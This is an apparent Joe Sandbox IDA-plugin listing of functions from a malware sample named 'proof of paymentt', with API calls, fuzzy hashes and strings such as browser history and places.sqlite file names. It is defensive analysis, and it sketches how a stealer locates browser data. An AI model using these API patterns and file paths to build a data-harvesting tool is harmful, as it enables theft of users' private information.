Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
??2@YAPAXI@Z.MSVCRT ref: 0040D108
??2@YAPAXI@Z.MSVCRT ref: 0040D126

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D

memcmp.MSVCRT ref: 00444BA5

Strings

8, xrefs: 00444B72
$, xrefs: 00444B80

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: AddressProc$memcmp
String ID: $$8
API String ID: 2808797137-435121686
Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E

FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582

Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC

DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA

Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
String ID:
API String ID: 1042154641-0
Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70

memset.MSVCRT ref: 00403A55

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F

Strings

history.dat, xrefs: 00403A5E
places.sqlite, xrefs: 00403A9E

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
String ID: history.dat$places.sqlite
API String ID: 3093078384-467022611
Opcode ID: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
Opcode Fuzzy Hash: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69

Uniqueness

Uniqueness Score: -1.00%

Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8

ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
GetLastError.KERNEL32 ref: 00417627

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ErrorLast$File$PointerRead
String ID:
API String ID: 839530781-0
Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

Strings

index.dat, xrefs: 0040C237
*.*, xrefs: 0040C1FE

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: FileFindFirst
String ID: *.*$index.dat
API String ID: 1974802433-2863569691
Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A

Uniqueness

Uniqueness Score: -1.00%

Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00409A10
memcpy.MSVCRT ref: 00409A28
??3@YAXPAX@Z.MSVCRT ref: 00409A31

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??3@mallocmemcpy
String ID:
API String ID: 3831604043-0
Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
GetLastError.KERNEL32 ref: 004175A2
GetLastError.KERNEL32 ref: 004175A8

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationTime
String ID:
API String ID: 1631957507-0
Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665

Uniqueness

Uniqueness Score: -1.00%

Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: Temp$DirectoryFileNamePathWindows
String ID:
API String ID: 1125800050-0
Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

d, xrefs: 0043752F

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041EF80

Strings

BINARY, xrefs: 0041EEDE

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset
String ID: BINARY
API String ID: 2221118986-907554435
Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0

GetStdHandle.KERNEL32(000000F5), ref: 00410530
FindCloseChangeNotification.KERNELBASE(?), ref: 00410654

Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE

Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
String ID:
API String ID: 1161345128-0
Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59

Uniqueness

Uniqueness Score: -1.00%

Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 004126DB

Strings

/stext, xrefs: 004126D6

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: _wcsicmp
String ID: /stext
API String ID: 2081463915-3817206916
Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8

Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306

Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88

FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98

Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
String ID:
API String ID: 159017214-0
Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 004152D6

Strings

failed to allocate %u bytes of memory, xrefs: 004152F0

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: malloc
String ID: failed to allocate %u bytes of memory
API String ID: 2803490479-1168259600
Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
??3@YAXPAX@Z.MSVCRT ref: 0040B1B6

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08

Uniqueness

Uniqueness Score: -1.00%

Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041BDDF
memcmp.MSVCRT ref: 0041BDF1

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memcmpmemset
String ID:
API String ID: 1065087418-0
Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00418D55
memset.MSVCRT ref: 00418D6C

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98

Uniqueness

Uniqueness Score: -1.00%

Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55

Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061

CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
String ID:
API String ID: 1481295809-0
Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

GetProcAddress.KERNEL32(?,00000000), ref: 0041362A

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
String ID:
API String ID: 3150196962-0
Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC

Uniqueness

Uniqueness Score: -1.00%

Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2

Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588

Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

